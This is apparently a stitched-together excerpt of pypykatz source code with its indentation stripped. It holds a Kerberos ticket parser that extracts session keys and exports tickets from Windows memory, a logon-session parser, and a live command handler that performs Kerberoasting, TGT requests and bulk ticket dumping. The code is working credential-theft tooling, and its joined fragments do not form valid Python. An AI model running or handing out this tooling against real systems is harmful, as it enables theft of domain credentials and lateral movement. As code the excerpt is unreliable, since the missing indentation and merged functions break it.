async def aparse(kerberos_ticket, reader, sysinfo, type=None):
kt = KerberosTicket()
kt.type = type
x = await kerberos_ticket.ServiceName.read(reader)
kt.ServiceName_type = x.NameType
x = await kerberos_ticket.ServiceName.read(reader)
kt.ServiceName = await x.read(reader)
kt.DomainName = await kerberos_ticket.DomainName.read_string(reader)
x = await kerberos_ticket.TargetName.read(reader)
if x:
y = await kerberos_ticket.TargetName.read(reader)
kt.ETargetName = await y.read(reader)
y = await kerberos_ticket.TargetName.read(reader)
kt.ETargetName_type = y.NameType
kt.TargetDomainName = await kerberos_ticket.TargetDomainName.read_string(
reader)
x = await kerberos_ticket.ClientName.read(reader)
kt.EClientName = await x.read(reader)
x = await kerberos_ticket.ClientName.read(reader)
kt.EClientName_type = x.NameType
kt.AltTargetDomainName = await kerberos_ticket.AltTargetDomainName.read_string(
reader)
kt.Description = await kerberos_ticket.Description.read_string(reader)
kt.StartTime = filetime_to_dt(kerberos_ticket.StartTime)
kt.EndTime = filetime_to_dt(kerberos_ticket.EndTime)
if kerberos_ticket.RenewUntil == 0:
kt.RenewUntil = datetime.datetime(1970,
1,
1,
0,
0,
tzinfo=datetime.timezone.utc)
else:
kt.RenewUntil = filetime_to_dt(kerberos_ticket.RenewUntil)
kt.KeyType = kerberos_ticket.KeyType
kt.Key = await kerberos_ticket.Key.read(reader)
kt.session_key = KerberosSessionKey.parse(kerberos_ticket.Key, sysinfo)
kt.TicketFlags = kerberos_ticket.TicketFlags
kt.TicketEncType = kerberos_ticket.TicketEncType
kt.TicketKvno = kerberos_ticket.TicketKvno
kt.Ticket = await kerberos_ticket.Ticket.read(reader)
kirbi = kt.to_asn1()
kt.kirbi_data[kt.generate_filename()] = kirbi
return kt
def parse(entry, reader):
"""
Converts KIWI_MSV1_0_LIST type objects into a unified class
"""
lsc = LogonSession()
lsc.authentication_id = entry.LocallyUniqueIdentifier
lsc.session_id = entry.Session
lsc.username = entry.UserName.read_string(reader)
lsc.domainname = entry.Domaine.read_string(reader)
lsc.logon_server = entry.LogonServer.read_string(reader)
if entry.LogonTime != 0:
lsc.logon_time = filetime_to_dt(entry.LogonTime).isoformat()
lsc.sid = str(entry.pSid.read(reader))
lsc.luid = entry.LocallyUniqueIdentifier
return lsc
def run_live(self, args):
if platform.system() != 'Windows':
print('[-]This command only works on Windows!')
return
from pypykatz.kerberos.kerberoslive import KerberosLive, live_roast # , purge, list_sessions #get_tgt, get_tgs
kl = KerberosLive()
if args.live_kerberos_module == 'roast':
res, errors, err = asyncio.run(live_roast(args.out_file))
if err is not None:
print('[LIVE][KERBEROS][ROAST] Error while roasting tickets! Reason: %s' % geterr(err))
return
if args.out_file is None:
for r in res:
print(r)
elif args.live_kerberos_module == 'tgt':
ticket = kl.get_tgt(args.target)
if args.out_file is None:
print_kirbi(ticket)
return
with open(args.out_file, 'wb') as f:
f.write(ticket)
elif args.live_kerberos_module == 'apreq':
apreq, sessionkey = kl.get_apreq(args.target)
print('APREQ b64: ')
print(format_kirbi(apreq.dump()))
print('Sessionkey b64: %s' % base64.b64encode(sessionkey).decode())
elif args.live_kerberos_module == 'currentluid':
print(hex(kl.get_current_luid()))
elif args.live_kerberos_module == 'purge':
luid = None
if args.luid is not None:
luid = args.luid
if luid.startswith('0x') is True:
luid = int(luid, 16)
luid=int(luid)
kl.purge(luid)
print('Tickets purged!')
elif args.live_kerberos_module == 'sessions':
kl.list_sessions()
elif args.live_kerberos_module == 'triage':
if args.luid is None:
ticketinfos = kl.get_all_ticketinfo()
else:
luid = KerberosCMDHelper.luid_converter(args.luid)
ticketinfos = kl.get_ticketinfo(luid)
table = [['LUID', 'ServerName', 'RealmName', 'StartTime', 'EndTime', 'RenewTime', 'EncryptionType', 'TicketFlags']]
for luid in ticketinfos:
if len(ticketinfos[luid]) == 0:
continue
for ticket in ticketinfos[luid]:
table.append([
hex(luid),
ticket['ServerName'],
ticket['RealmName'],
filetime_to_dt(ticket['StartTime']).isoformat(),
filetime_to_dt(ticket['EndTime']).isoformat(),
filetime_to_dt(ticket['RenewTime']).isoformat(),
str(ticket['EncryptionType']),
str(ticket['TicketFlags'])
])
print_table(table)
elif args.live_kerberos_module == 'dump':
if args.luid is None:
tickets = kl.export_all_ticketdata()
else:
luid = KerberosCMDHelper.luid_converter(args.luid)
tickets = kl.export_ticketdata(luid)
if args.outdir is not None:
for luid in tickets:
for ticket in tickets[luid]:
with open(args.outdir + 'ticket_%s.kirbi' % 'a', 'wb') as f:
f.write(ticket['Ticket'])
else:
for luid in tickets:
if len(tickets[luid]) == 0:
continue
print('LUID @%s' % hex(luid))
for ticket in tickets[luid]:
print_kirbi(ticket['Ticket'])